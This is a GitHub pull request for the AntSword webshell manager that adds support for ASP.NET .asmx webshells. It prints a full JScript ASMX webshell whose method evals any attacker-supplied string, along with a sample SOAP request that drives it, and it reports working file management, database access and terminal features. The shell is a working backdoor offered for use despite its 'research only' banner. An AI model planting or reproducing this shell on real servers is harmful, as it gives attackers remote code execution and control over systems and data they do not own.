Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Shell support with the suffix of asmx added. #340

Open
wants to merge 1 commit into
base: master
Choose a base branch
from

Conversation

ba0gu0
Copy link

@ba0gu0 ba0gu0 commented Sep 7, 2023

添加asmx后缀的shell支持。

由于asmx的shell传输数据时使用xml格式,目前蚁剑对asp类的shell只支持标准的post发包,不支持自定义格式,使用编码器也无法实现,因此尝试直接底层实现asmx shell的xml发包。

shell

<%@ WebService Language="JScript" class="asmxWebMethodSpy"%>
import System;
import System.Text;
import System.Web;
import System.IO;
import System.Web.Services;

public class asmxWebMethodSpy extends WebService
{      
    WebMethodAttribute function Invoke(Ivan: String) : Void
    {
        var I = HttpContext.Current;
        var Request = I.Request;
        var Response = I.Response;
        var Server = I.Server;
            Response.Write("<H1>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></H1>");
        eval(Ivan);
    }
}

shell请求

  • 此shell在连接时,需要以xml格式发包
POST /2.asmx HTTP/1.1
Host: 172.16.12.73
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/21.0.1
Content-Type: text/xml; charset=utf-8
Content-Length: 350
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <Invoke xmlns="http://tempuri.org/">
            <Ivan>Response.Write("Hello Word !");Response.End();</Ivan>
        </Invoke>
    </soap:Body>
</soap:Envelope>

实现功能

  • 首页添加,正常。
  • 文件管理,上传、下载、新建、删除、修改、重命名,正常。
  • 数据库管理,access、mssql 正常。
  • 虚拟终端,正常。

测试结果

  1. 添加
image
  1. 虚拟终端
iShot_2023-09-07_23 04 29
  1. 文件管理
image iShot_2023-09-07_23 05 59 iShot_2023-09-07_23 05 38
  1. 数据库管理
iShot_2023-09-07_22 59 47 iShot_2023-09-07_22 59 33

END

@Medicean Medicean added the 💪enhancement 功能增强 label Sep 15, 2023
@Medicean
Copy link
Collaborator

@ba0gu0 感谢PR,看了一下Payload,可以将新类型改为 ASPXRAW,将 asmx 作为一个编码器,会更有通用性一些。

例如将来若有shell是接收 json 格式,只需要加个编码器就可以满足需求了。

@yzddmr6
Copy link
Member

yzddmr6 commented Sep 15, 2023

done,采用编码器方式实现:b088f1c

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
💪enhancement 功能增强
Projects
None yet
Development

Successfully merging this pull request may close these issues.

3 participants